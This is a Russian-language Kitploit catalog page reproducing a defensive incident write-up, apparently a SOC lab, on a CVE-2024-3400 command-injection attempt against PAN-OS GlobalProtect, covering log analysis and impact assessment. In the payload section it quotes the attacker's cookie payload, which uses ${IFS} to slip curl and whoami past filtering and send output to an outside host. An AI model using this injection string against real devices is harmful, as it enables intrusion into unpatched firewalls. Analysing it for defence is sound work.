Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Расследование попытки инъекции команд CVE-2024-3400 в PAN-OS: анализ доставки полезной нагрузки, внутренней обработки и проверки выполнения на основе журнальных записей. | Kitploit
Инструменты/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
Анализ уязвимостейВеб-безопасностьЦифровая криминалистикаРазведка угрозРеагирование на ИнцидентыАнализ Журналов
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

Расследование попытки инъекции команд CVE-2024-3400 в PAN-OS: анализ доставки полезной нагрузки, внутренней обработки и проверки выполнения на основе журнальных записей.

Репозиторий
124 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Read on Medium

Расследование попытки инъекции команд CVE-2024-3400 в PAN-OS

Обзор

Этот проект описывает расследование попытки инъекции команд CVE-2024-3400 в службу GlobalProtect PAN-OS.

Цель состояла в том, чтобы определить:

  • является ли это реальной атакой
  • произошло ли выполнение команд
  • есть ли признаки компрометации

Обзор оповещения

Было сработано критическое оповещение, указывающее на возможную попытку эксплуатации уязвимости.

  • Цель: 172.16.17.139 (PA-Firewall-01)
  • Источник: 144.172.79.92
  • Конечная точка: /global-protect/login.esp
  • Метод: POST
  • Действие: Разрешено

Alert Overview


Вредоносная полезная нагрузка

Запрос содержит специально сформированный cookie:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

Payload

Ключевые наблюдения

  • ${IFS} обходит фильтрацию пробелов
  • whoami пытается получить идентификатор системы
  • curl пытается установить исходящее соединение

Это полезная нагрузка для инъекции команд


Данные веб-сервера

Журналы Nginx подтверждают, что запрос достиг сервера:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Nginx Logs

Вредоносный запрос был принят и обработан.


Внутренняя обработка

Системные журналы показывают, что полезная нагрузка достигла внутренней логики:

Processing Logs

Ключевой вывод

  • полезная нагрузка была внедрена во внутреннюю команду (dt_curl)
  • была предпринята попытка исходящего запроса
  • цепочка выполнения достигла внутренних компонентов

Однако:

Сбой DNS-запроса → исходящее соединение не удалось


Инфраструктура атакующего

Атакующий IP-адрес:

  • 144.172.79.92
  • помечен как вредоносный
  • связан с хостинг-провайдером

Attacker IP

Это подтверждает внешнее происхождение атаки.


Сетевая хронология

До атаки с системой взаимодействовало несколько IP-адресов:

Timeline

Только 144.172.79.92 напрямую связан с эксплуатацией уязвимости.


Оценка воздействия

Подтверждено

  • попытка эксплуатации CVE-2024-3400
  • доставлена вредоносная полезная нагрузка
  • запрос обработан сервером
  • полезная нагрузка достигла внутренней обработки
  • инициирована попытка исходящего соединения

Не подтверждено

  • выполнение команд ОС
  • вывод команд
  • эксфильтрация данных
  • reverse shell
  • закрепление
  • латеральное перемещение

Заключение

Это была реальная попытка инъекции команд.

Атакующий успешно:

  • доставил вредоносный запрос
  • внедрил полезную нагрузку
  • инициировал внутреннюю обработку

Однако:

подтверждённого выполнения команд или компрометации системы нет


Итоговая классификация

Попытка инъекции команд
Полезная нагрузка обработана — подтверждённого выполнения или воздействия нет

Скачать инструмент